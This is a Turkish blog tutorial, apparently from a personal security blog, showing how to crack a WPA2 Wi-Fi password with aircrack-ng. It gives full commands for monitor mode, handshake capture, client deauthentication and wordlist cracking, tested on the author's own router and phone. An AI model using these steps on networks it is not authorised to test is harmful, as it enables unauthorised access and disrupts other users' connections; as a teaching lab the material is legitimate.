Aircrack-ng İle WPA2 Şifre Kırma

(+) Birebir denenmiştir ve başarılı olunmuştur.

Bu yazının ilintili olduğu makale dizisi şu şekildedir:

Bu dökümanda USB Wifi dongle kullanılarak etraftaki router'lardan birisi hedef seçilecektir, ardından router'a giden ve gelen paketler monitör edilecektir, daha sonra hedef router'a bağlı istemcilerden birisi deauthenticate edilerek istemcinin router'a tekrar bağlantı kurmak için göndereceği WPA2 anahtarını (router şifresini) içeren paketler yakalanacaktır. Son olarak dosyalanan paketlerden anahtarı taşıyan paketler aircrack-ng ve bir wordlist ile kırılacaktır ve hedef router'ın şifresi elde edilecektir.

Not:

Bu dökümanda hedef router olarak evdeki Airties_Air5341 modemi, deauthenticate edilecek istemci olarak da cep telefonum Nokia Lumia 620 seçilmiştir. Bu cihazlarla bu dökümandaki şifre kırma işlemi birebir denenmiş ve başarılı olunmuştur.

İlk olarak usb wifi cihazını monitör moda geçirmemiz gerekmektedir. Bunun için usb wifi cihazını bilgisayara takalım ve Ubuntu masaüstünün sağ üst köşesinde yer alan internet simgesine tıklayıp usb wifi bir ağa bağlanmışsa disconnect edelim. Ardından USB wifi'ın interface adını öğrenmek için aşağıdaki kodu girelim:

ifconfig

Çıktı:

eth0      	Link encap:Ethernet  HWaddr 20:cf:30:64:a9:d5  
		inet addr:192.168.2.201  Bcast:192.168.2.255  Mask:255.255.255.0
	        ....................................................................

lo        	Link encap:Local Loopback  
  		inet addr:127.0.0.1  Mask:255.0.0.0
	        ....................................................................

wlan0     	Link encap:Ethernet  HWaddr 48:5d:60:38:0a:ff  
  		inet addr:192.168.2.70  Bcast:192.168.2.255  Mask:255.255.255.0
	        ....................................................................  			
wlan2     	Link encap:Ethernet  HWaddr ec:08:6b:17:c4:24  
  		UP BROADCAST MULTICAST  MTU:1500  Metric:1
  	        ....................................................................

USB Wifi cihazı takılı değilken wlan2 interface'i olmadığından ve USB wifi cihazı takılı olduğunda wlan2 interface'i olduğundan Usb Wifi cihazının interface'inin wlan2 olduğunu anlarız. Şimdi bu interface adını kullanarak aşağıdaki kodları terminale girelim.

airmon-ng stop wlan2
ifconfig wlan2 down
airmon-ng start wlan2 4

airmon-ng kodu ile usb wifi'ı channel 4'te monitör moda geçirmiş oluyoruz.

Not:

Airmon-ng'nin aldığı 4 numarası usb wifi'ın dinleyeceği channel'ı ifade eder. Channel 4'ün seçilmesinin nedeni sonraki aşamalarda, seçilen modem'in channel 4'ten çalıştığı hatasını vermesinden dolayıdır. Bir başka router seçildiğinde eğer başka bir channel hata olarak veriliyorsa o zaman bu aşamaya dönülüp channel'ın istenilen değerde girilmesi gerekmektedir.

Sıradaki işlem monitör moddaki usb wifi'ın tespit ettiği etraftaki router'ları öğrenmektir. Bu işlem için aşağıdaki kod kullanılır.

Terminal 1:

airodump-ng wlan2       // (!) Uyarı:

                        // Bir Önceki Komut Çalıştığında USB ethernet
                        // Interface Adı Yenilenebilir. Bu Durumda
                        // Bir Önceki Komutun Sunduğu Yeni Ethernet
                        // Interface Adıyla airodump-ng Kullanılmalıdır.

Çıktı:

Diyelim ki Airties_Air5341 modemini seçtik (Bu evdeki modem). Şimdi bu modemin MAC adresini BSSID sütunundan kopyalayalım:

18:28:51:FA:64:1A

Not: BSSID demek cihazın MAC adresi demektir ve ESSID demek cihazın SSID'si yani dışarıdan görünen ismi demektir. Airties_Air5341 bir SSID'dir ve ESSID olarak adlandırılır.

Şimdi yeni bir terminal açalım ve hedef router'ın MAC adresini aşağıdaki koda yerleştirelim. Ardından ENTER'layalım.

Terminal 2:

airodump-ng -c 4 --bssid 18:28:51:FA:64:1A -w PSK wlan2

-c parametresi dinlenecek channel'ın değerini alır. Yukarıdaki koda göre channel 4 dinlenecektir.
--bssid hedef router'ın MAC adresini alır. Böylece sadece hedef router'ın paketleri kıskaca alınır.
-w parametresi yakalanan paketlerin dosyalanacağı dosyanın adını alır.

Yukarıdaki kodun çıktısı aşağıdaki gibi olur:

Çıktı:

Yukarıdaki resmin ilk kısmında seçtiğimiz router ve detayları yer almaktadır. İkinci kısmında ise router'a bağlı istasyonlar (istemciler) listelenmektedir. Görüldüğü üzere bir tane istemci vardır. Yukarıdaki kod hedef router'ın gelen giden paketlerini dosyalama vazifesi görmektedir. Dolayısıyla sıradaki kod çalıştırılacağı zaman bu kod çalışmaya devam etmelidir! Şimdi yukarıdaki ekranda belirtilen istasyonun (istemcinin) MAC'ini kopyalayalım.

3C:C2:43:5E:ED:C8	// Bu MAC Nokia Lumia 620'nindir.
                        // Çünkü evde internete bağlı başka
                        // cihaz yok. Laptop'ın ethernet
                        // kablosunu çektim ve wifi'dan olan
                        // bağlantısını kapattım. Lumia'nın
			// web tarayıcısını kullandığımda,
                        // örneğin bir sayfayı refresh'ledi-
                        // ğimde Station'ın Packet sütunundaki
                        // değer sabitken bir anda fırlıyor.
                        // Dolayısıyla bu mac Lumia'nın.

Mac'ini aldığımız istemciyi deauthenticate edelim. Bunun için bir üçüncü terminal açalım ve aşağıdaki kodu girelim:

Terminal 3:

aireplay-ng -0 3 -a 18:28:61:FA:64:1A -c 3C:C2:43:5E:ED:C8 wlan2

-0 ifadesi deauthenticate et manasına gelir.
3 sayısı 3 tane deauthenticate paketini istemciye gönder anlamına gelir.
-a parametresi Access Point'in MAC adresini alır.
-c parametresi ise client'ın mac adresini alır.

Çıktı:

Not:

Eğer “Kullanılan channel farklı, AP channel’ı farklı” uyarısı gelirse ve yukarıda gerçekleşen deauthenticate paketleri gönderimi gerçekleşmezse iki alternatif yöntem uygulanabilir. Birinci yöntem bir önceki adımda çalıştırdığımız airodump-ng’yi durdurup uyarıda bahsi geçen AP’nin çalıştığı channel değeri ile çalıştırıp tekrardan airodump-ng ile deauthenticate adımı olan komutu uygulayabiliriz ve yukarıda gerçekleşen deauthenticate paketleri gönderimi gerçekleşebilir. İkinci yöntem aireplay-ng adımını (yani deauthenticate paket gönderme adımını) farklı channel uyarısı verse de tekrar tekrar çalıştırma denemesi yapılabilir ve en nihayetinde channel’lar denk geldiğinde çalışıp deauthenticate paketleri gönderilebilir (Benim Not: Her iki yöntem de denenmiştir ve birinci yöntemde bazen başarılı olunurken ikinci yöntemde devamlı başarılı olunmuştur).

Deauthenticate olan Lumia otomatikmen tekrar internete bağlanmaya çalışacaktır ve bu sayede router ile arasında handshake paketleri gidip gelecektir ve router'a gelen giden paketleri dinleyen ve dosyalayan terminal 2'deki airodump-ng tool'u WPA2 şifresini (router'ın şifresini) yakalamış olacaktır. Şimdi terminal 2 'deki paketleri dosyalayan airodump-ng tool'unu sonlandıralım ve gerçekten de WPA2 şifresi dosyalanmış mı diye Wireshark ile airodump-ng'nin oluşturduğu dosyaya bakalım.

sudo wireshark &

Açılan wireshark ekranından File -> Open menüsüne tıklayalım ve PSK-01.cap dosyasını seçelim.

Not: PSK-01.cap dosyasının adı Terminal 2'deki airodump komutunun aldığı PSK argümanı nedeniyle PSK olmuştur.

airodump-ng -c 4 --bssid 18:28:51:FA:64:1A -w PSK wlan2

Wireshark -> File -> Open -> PSK-01.cap ile açılan penceredeki sağ tarafta yer alan Info sütununa birkaç kez tıklandığı takdirde Key ifadeli paketler aşağıdaki gibi ilk sıralarda ekrana yansıyacaktır.

Handshake paketlerini görüntülemenin bir başka yolu da filtre kutucuğuna eapol yazmaktır.

[!] Uyarı:

Eğer handshake (key) paketleri yukarıdaki gibi sıralanmazsa yani sniff’lenememişse bir önceki aireplay-ng komut adımında deauthenticate paket gönderim sayısı -0 parametresine 3 yerine örneğin 10 girerek arttırılır ve deauthenticate paket gönderimi bu şekilde tekrarlanır. Ardından tekrar dosya wireshark’da açılır ve key paketleri gelmiş mi kontrol edilir. Gelmemişse tekrar aireplay-ng adımı -0 parametresinde 10 değeri var iken tekrarlanır. Key’ler dosyaya gelene kadar aireplay-ng adımı tekrarlanır.

Not:

Eğer aireplay-ng adımında “channel farklı” uyarısı gelirse ve deauthenticate paketlerini gönderme yapmazsa komut çalıştırılması aynı şekilde tekrardan denenmelidir. Channel’lar denk gelene kadar aireplay-ng adımındaki komut çalıştırılması aynı şekilde tekrarlanmalıdır. Bir süre sonra çalıştırılan komutun channel’ı AP’nin channel’ıyla denk gelecektir ve deauthenticate paketleri gönderimi sağlanabilecektir.

Tekrarlı aireplay-ng ile deauthenticate paket gönderimleri sonucunda en nihayetinde tekrardan bir aireplay-ng adımı sonrası daha wireshark ile dosya açıldığında key paketlerinin dosyaya geldiği görülecektir. (Benim Not: Bu belge 2022 yılında denendiğinde birkaç denemede key’ler gelmemiştir ama birkaç deneme sonrası tekrar deneme sonucunda tekrardan dosya açıldığında key’lerin geldiği görülmüştür).

Böylece istemcinin (lumia'nın) router'a deauthenticate sonrası tekrar bağlanmak için şifre gönderdiğini ve airodump-ng komutumuzun da havada giden bu paketi dosyaya kaydettiğini yukarıda sıralı paketlerden anlamış bulunmaktayız. Şimdi bu dosyayı aircrack-ng'ye verelim ve bir wordlist ile bu dosyadaki KEY paketlerinin içerdiği WPA şifresini (router'ın şifresini) kıralım.

Terminal 4:

aircrack-ng -w rockyou.txt -b 18:28:61:FA:64:1A PSK-01.cap

-w wordlist'i alır.
-b daha önce kullandığımız Router MAC'ini alır.

Not: rockyou.txt dosyasının içerisinde bir yere “tuzlucayir” string'i yerleştirilmiştir.

Çıktı:

Görüldüğü üzere PSK-01.cap dosyasındaki WPA2 şifresi rockyou.txt ile kırılmıştır ve router'ın şifresinin tuzlucayir olduğu tespit edilmiştir. Artık şifreli erişime sahip router'a erişebiliriz.

Özet

# Önce usb wifi'yı monitör moda geçirelim.
# Bunun için Ubuntu masaüstünün sağ üst köşesindeki
# internet bağlantısına tıkla ve USB Wifi'ı
# disconnect et. Ardından şunları terminale gir.

Terminal 1:

airmon-ng stop wlan2
ifconfig wlan2 down
airmon-ng start wlan2 4
airodump-ng wlan2

# Yukarıdaki kodla ekrana gelen router'lardan
# birini seç ve mac adresini kopyala. Ardından yeni
# bir terminal aç ve kopyaladığın mac'i aşağıdaki
# koda koyup hedef router'ın paketlerini dosyalamaya
# başla.

Terminal 2:

airodump-ng -c 4 --bssid Hedef_Router_MAC_Adresi -w psk wlan2

# Yukarıdaki kod dosyalamaya devam etsin.
# Yakaldığı hedef router'a bağlı station'lardan # (client'lardan) birinin mac'ini kopyalayalım ve
# deauthenticate etmek için aşağıdaki koda koyup
# kodu yeni bir terminalde çalıştıralım.

Terminal 3:

aireplay-ng -0 10 -a Router_MAC_Adresi -c Client_MAC_Adresi wlan2

# Böylelikle önceki terminal penceresinde
# çalışan airodump-ng komutu deauthenticate
# olan istemci tekrar bağlanacağı zamanki
# handshake paketlerini yakalayıp dosyalayacaktır.
# Bundan sonraki aşama elde edilen handshake
# paketlerini aircrack tool'una kırdırmak olacaktır.

Terminal 4:

aircrack-ng -w rockyou.txt -b Router_Mac_Adresi psk-01.cap

# Ekrana kırılan şifre gösterilecektir.

Yararlanılan Kaynaklar:

https://www.youtube.com/watch?v=GLO9HGDwOY0
https://www.youtube.com/watch?v=WfYxrLaqlN8

Bu yazı 15.06.2025 tarihinde, saat 09:35:07'de yazılmıştır. 16.06.2025 tarihi ve 06:40:12 saatinde ise güncellenmiştir.

Yazar : Hasan Fatih ŞİMŞEK

Görüntülenme Sayısı : 38

Yorumlar

Henüz yorum girilmemiştir.

Yorum Ekle

	#Kategoriler
	->	Genel
	->	Webgoat Uygulaması
	->	DVWA Uygulaması
	->	Çeşitli Sızma Teknikleri
	->	Siber Güvenlik Araçları
	->	Linux Temelleri
	->	Siber Güvenlik Genel Kültür

#Popüler Yazılar
	->	Faz Açısını Hesaplama
	->	Hub, Switch, Router, Modem, Gateway ve Access Point Farkları
	->	Ders 12 - Ajax Security > DOM-Based cross-site scripting
	->	GET ile POST Arasındaki Fark
	->	BGA Sınav Soruları 2016

#En Son Yazılar
	->	Hping3 ile Dos Yapma ve Tcpdump ile İzleme
	->	Firewall Log'larını Anlık İzleme
	->	DNS Zone Transferi Saldırısı
	->	Aircrack-ng ile Hedefi Hattan Düşürme
	->	Aircrack-ng İle WPA2 Şifre Kırma

#Arşiv
	► 2014 ► Ekim (1) • Blog Maceram Başlar ► Kasım (7) • Parazit ve Gürültü Arasındaki Fark Nedir? • Stack ve Heap Arasındaki Fark • Sinyal Denkleminin Anlamı • Periyot ve Frekans Nedir? • Faz Açısını Hesaplama • Üniversite Öğrencilerinin Sağlık Aktivasyonu • Nesne Yönelimli Programlama Nedir ► Aralık (3) • Skype'ta Birbirimizin Sesini Nasıl Duyuyoruz? • Hub, Switch, Router, Modem, Gateway ve Access Point Farkları • Askerlikle İlgili Sorular ► 2015 ► Ocak (1) • Dev Firmaların Mülakatlarda Sorduğu 15 Çetin Soru ► Şubat (4) • Yapay Zeka İnsanı Geçemez • Webgoat Nedir? • Ubuntu 14.04 LTS Linux'a Webgoat Kurulumu • Windows'a Webgoat Kurulumu ► Mart (1) • Ders 1 - Introduction(Giriş) ► Nisan (3) • Ders 2 - General > Http Basics • Ders 3 - General > Http Split • Ders 4 - Access Control Flaws > Using an Access Control Matrix ► Mayıs (7) • Ders 5 - Access Control Flaws > Bypass a Path Based Access Control Scheme • Ders 6 - Role Based Access Control > Stage 1 • Ders 7 - Role Based Access Control > Stage 2 • Ders 8 - Role Based Access Control > Stage 3 • Ders 9 - Role Based Access Control > Stage 4 • Ders 10 - Access Control Flaws > Remote Admin Access • Ders 11 - Ajax Security > Same Origin Policy Protection ► Haziran (4) • Ders 12 - Ajax Security > DOM-Based cross-site scripting • Ders 13 - Ajax Security > Client Side Filtering • GET ile POST Arasındaki Fark • Ders 14 - Ajax Security > DOM Injection ► Temmuz (7) • Ders 15 - Ajax Security > XML Injection • Ders 16 - Ajax Security > JSON Injection • Ders 17 - Ajax Security > Silent Transactions Attacks • UML Sınıf Diyagramları • UML Sınıf Diyagramı İlişkileri • Association vs. Aggregation vs. Composition • Ders 18 - Ajax Security > Dangerous Use of Eval ► Ağustos (2) • Ders 19 - Ajax Security > Insecure Client Storage • Ders 20 - Authentication Flaws > Password Strength ► Eylül (11) • Ders 21 - Authentication Flaws > Forgot Password • Ders 22 - Authentication Flaws > Basic Authentication • Ders 23 - Authentication Flaws > Multi Level Login 1 • Ders 24 - Authentication Flaws > Multi Level Login 2 • Ders 25 - Buffer Overflows > Off-by-One Overflows • Ders 26 - Code Quality > Discover Clues in the HTML • Ders 27 - Concurrency > Thread Safety Problems • Ders 28 - Concurrency > Shopping Cart Concurrency Flaw • Ders 29 - Cross-Site Scripting (XSS) > Phishing with XSS • Ders 30 - Cross-Site Scripting (XSS) > Stage 1: Stored XSS • Ders 31 - Cross-Site Scripting > Stage 2: Block Stored XSS using Input Validation ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2016 ► Ocak (27) • DVWA Nedir? • Windows'a DVWA Kurulumu • Ubuntu 14.04 LTS Linux'a DVWA Kurulumu • Ders 1 - DVWA'ya Giriş • Ders 2 - Brute Force (Low Level) • Ders 3 - Brute Force (Medium Level) • Ders 4 - Command Injection (Low Level) • Ders 5 - Command Injection (Medium Level) • Ders 6 - Command Injection (High Level) • Ders 7 - Cross Site Request Forgery (Low Level) • Ders 8 - File Inclusion (Low Level) • Ders 9 - File Inclusion (Medium Level) • Ders 10 - File Inclusion (High Level) • Ders 11 - File Upload (Low Level) • Ders 12 - File Upload (Medium Level) • Ders 13 - File Upload (High Level) • Ders 14 - SQL Injection (Low Level) • Ders 15 - SQL Injection (Low Level) II • Ders 16 - SQL Injection (Medium Level) • Ders 17 - Blind SQL Injection (Low Level) • BGA Sınav Soruları 2016 • Ders 18 - Blind SQL Injection (Medium Level) • Ders 19 - Reflected XSS (Low Level) • Ders 20 - Reflected XSS (Medium Level) • Ders 21 - Reflected XSS (High Level) • Ders 22 - Stored XSS (Low Level) • Ders 23 - Stored XSS (Medium Level) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2017 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2018 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (1) • Ve Blog'a Döndüm ► Ekim (0) ► Kasım (6) • Metasploit Framework'e Giriş • Metasploit ile Bir Sızma Uygulaması (ms08-067) • Metasploit Saldırı Aşamaları (Özet) • Metasploit Komutları • Metasploit Detay Bilgiler • Metasploit Detay Bilgiler (Özet) ► Aralık (0) ► 2019 ► Ocak (0) ► Şubat (0) ► Mart (2) • Arp Spoofing Saldırısı Nedir ve Nasıl Yapılır • Arp Spoofing İlave Uygulamalar ► Nisan (0) ► Mayıs (0) ► Haziran (1) • Oyun Motoru Nedir ► Temmuz (1) • Haberleşme Teknolojisi ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2020 ► Ocak (1) • Siber Güvenlikte Düşük Seviye Açıklık Nedir ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2021 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2022 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (1) • Apache Web Sunucuyu Yurt Dışı (Türkiye Dışı) Trafiğe Kapama ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2023 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2024 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (58) • APT Saldırısı Nedir • Bug vs Vulnerability • CAPEC Nedir ve Kullanımı • CTF Nedir • CVE Nedir ve Kullanımı • CWE vs CVE • Character Set, Character Encoding ve Character Reference Nedir • Exploit Arama Yöntemi • Framework Nedir • Mirai Zararlısı Nedir • Paypal ve Güvenlik • RAT Nedir • Ransomware Nedir • Bir Siteye Shell Atmanın 20 Temel Yöntemi • Sisteminizi Shell'lerden Korumanın Yöntemleri • Sosyal Mühendislik Saldırı Türleri • Stagefright Virüsü Nedir • Vulnerability Scanner'ların Çalışma Mantığı • Crypto 101 - Notlarım • ASP.NET'te .config Dosyalarının Hiyerarşisi ve Sıkılaştırma için Web.config Dosyası Oluşturma • Authentication vs Authorization • Brute Force ve Dictionary Saldırılarını CSRF Token ile Önleme • CSRF Nedir ve Nasıl SameSite ile Tamamen Önlenir • Edge, Chrome ve Firefox'da Önbellek Tazeleme • DVWA Blind SQL Injection Hakkında Ek Not • HTTP Range Başlığı Nedir • Paylaşımlı Hosting'de Komşu Web Sitelerini Tespit Etme • Mass Deface Nedir • Cookie'ye HttpOnly, Secure ve Same-Site Bayraklarının Uygulanmaması Açıklığı • Email Adres İfşası Açıklığı • Feature Policy Başlığı • HTTP Strict Transport Security (HSTS) Başlığı Nedir • Insecure Frame Usage (External) Açıklığı • Güvensiz İletişim Güvenlik Protokolü Açıklığı • Content-Type Başlığı Eksikliği Açıklığı • Subresource Integrity (SRI) Eksikliği Açıklığı • Cacheable Https Response Açıklığı • CSRF Korumasız HTML Formu Açıklığı • Yanlış Yapılandırılmış Access-Control-Allow-Origin Başlığı Açıklığı • Remote File Inclusion (RFI) Saldırısı ve Korunma Yöntemi • Tamper Data Nedir • User Agent Başlığı Nedir • Web Hosting vs VPS Hosting • OWASP Mutillidae Web Uygulaması Açıklıklar Listesi • Mobil Penetrasyon Testi Nedir ve Neleri Kapsar? • iOS Uygulama Pentest - Kısa Kısa Notlarım • Kerberos Nedir • Temel Windows CMD Komutları • İnternet Ağı Şeması • DNS DOS Saldırılarına Karşı Önlem • DNS Zone Nedir • NAT (Network Address Translation) Nedir • Netcat ile Sistem Ele Geçirme Senaryosu Örneği • Nmap Kullanımı 1 - Çıkardığım Notlarım • Nmap Kullanımı 2 - Çıkardığım Notlarım • OSI ve TCP-IP • Proxy vs VPN • Router İçerisindeki Firewall ve DHCP ► Eylül (27) • SSH Tünelleme • Wireshark'ta Paket İçeriği (Raw Data) Neden Hex Gösterime Sahip • Linux Environment (Ortam) Değişkenleri • GNU, Özgür Yazılım, Copyleft ve GPL Nedir • GNU Utils vs Bash • Linux'ta Dizinlerin Amaçları ve Bazı Önemli Dosyalar • Linux Terminal Komutları • Standard Release Linux vs Rolling Release Linux • Tex Nedir • Özgür Yazılım Dünyasında Community (Topluluk) Nasıl Yazılım Geliştirebiliyor • UNIX Nedir • X Window System Nedir • Reverse Shell Alınmış Sistem Üzerinde Root - Administrator Yetkilerinde Kullanıcı Oluşturmak • AB Tool'u ile Bir Web Sunucuya GET Flood DoS Saldırısı • Apache Range Saldırıları ile Apache Web Sunucuları Servis Dışı Bırakma • DVWA Brute Force (High Level) • Cain Abel ile MySQL Hash Kırma • Curl ile Http Taleplerinde Bulunma • Konsoldan Http Talep Yapma • WebDAV Keşif ve Exploitation • Davtest Tool ile WebDAV Hacking • DVWA Command Injection ile Reverse Shell Alma Uygulamaları • DVWA Content Security Policy Başlığı Uygulamaları • DVWA Stored XSS Saldırısı ile Çerez Çalma • Google Hacking Database (GHDB) Kullanımı • Ettercap ile Parola Sniff'leme • Httrack Tool'u ile Web Site Klonlama ve Hesap Çalma ► Ekim (23) • Http PUT Metodu ile Dosya Upload'lama Uygulaması • Slow Http GET, Slow Http POST ve Slow Http Read DoS Saldırıları • Slowhttptest Kurulumu • Http Talep Paketlerinde Parametre Gönderim Yöntemleri • Telnet ve Netcat ile Http Taleplerinde Bulunma • Http Güvenlik Başlıkları Kullanan Günümüz Web Sitelere Örnekler • Antivirus Yazılımı Neden Kullanılmalı • Ses Dalgası Nedir • Fonksiyon Nedir • Logaritma Nedir • İntegral Nedir • Diferansiyel Nedir • Işık Yılı Nedir • NetworkMiner ile Trafik Analizi • Slow Http POST Saldırıları ile Nginx Sunucuları Servis Dışı Bırakma • SSL-TLS DoS Saldırısı ile Apache Web Sunucuları Servis Dışı Bırakma • SSLStrip Saldırısı Nedir ve Nasıl Uygulanır • Setoolkit ile Java Applet Saldırısı • Stored XSS ve Socat ile Çerez Çalma • ThinVNC 1.0b1 Directory Traversal Açıklığı ve Sömürme • Range Saldırısı ile Windows IIS Web Sunucuları Servis Dışı Bırakma • Websploit ile ARP Flood DoS Saldırısı • WRK Tool'u ile Bir Web Sunucuya GET Flood DoS Saldırısı ► Kasım (0) ► Aralık (0) ▼ 2025 ► Ocak (0) ► Şubat (0) ► Mart (6) • DVWA Brute Force (High Level) II • DVWA Cross Site Request Forgery (Medium Level) • DVWA Cross Site Request Forgery (High Level) • DVWA SQL Injection (High Level) • DVWA Blind SQL Injection (High Level) • DVWA Stored XSS (High Level) ► Nisan (1) • DVWA Güvenlik Seviyesi Bug'da Kaldığında Çözüm ► Mayıs (35) • Apache Remote Buffer Overflow Zafiyetini Sömürme ve Yetki Yükseltme • Burpsuite ile Şifre Kırma Saldırısında Arayüzde Bildirim Metotları • Otomatik Tamamlama Açık Bırakılması • Dom XSS • Http Trace Metodunun Açık Bırakılması • Phishing By Navigating Browser Tabs • Referer ve Referrer-Policy Başlıkları • Second Order SQL Enjeksiyonu • X-Frame-Options Başlığı • X-XSS-Protection Başlığı • Güncelliğini Yitirmiş jQuery Açıklığı • XSS (Content-Sniffing) • Apache'de HTTPS Güvenliği • Apache'de Directory Listing Kapatma • Apache'de HTTP Güvenlik Başlıklarını Ekleme • Apache'de Http Options Metodunu Kapatma • Apache'de Trace Metodunu Açma ve Kapatma • Apache'de Fingerprinting Engelleme • Apache'de SSL Disable Etme, TLS Enable Etme • IIS'te HTTPS Güvenliği • IIS'de HTTP Güvenlik Başlıklarını Ekleme • IIS'te Fingerprinting Engelleme • IIS'te Http Metotlarını Açma ve Kapama (GUI ile) • IIS'te Http Metotlarını Açma ve Kapama (Web.config İle) • IIS Sunucularda Server Başlığını Yanıltıcı Bir Değerle Doldurma • Linux Web Sunucularda Uptime Kapatma • Kali Linux Live'den Windows SAM Dosyasını Çekme - 1 • Kali Linux Live'den Windows SAM Dosyasını Çekme - 2 • Kali Linux Live'den Windows SAM Dosyasını Manipule Etme • Ubuntu Linux'dan Windows SAM Dosyasını Çekme • Psexec Nedir ve Kullanımı • Payload'u Exe Yapmak ve Sisteme Sızma Örneği • Windows Parolasının Direk Açık Halini Ele Geçirme (Mimikatz) • Zararlı PDF Oluşturma ve Windows Sisteme Sızma Örneği • Hiren’s BootCD PE ile Windows Parola Hack’i ► Haziran (6) • İç Ağa Sızma Örneği • Aircrack-ng İle WPA2 Şifre Kırma • Aircrack-ng ile Hedefi Hattan Düşürme • DNS Zone Transferi Saldırısı • Firewall Log'larını Anlık İzleme • Hping3 ile Dos Yapma ve Tcpdump ile İzleme

#Giriş

	ID	:
	Şifre	: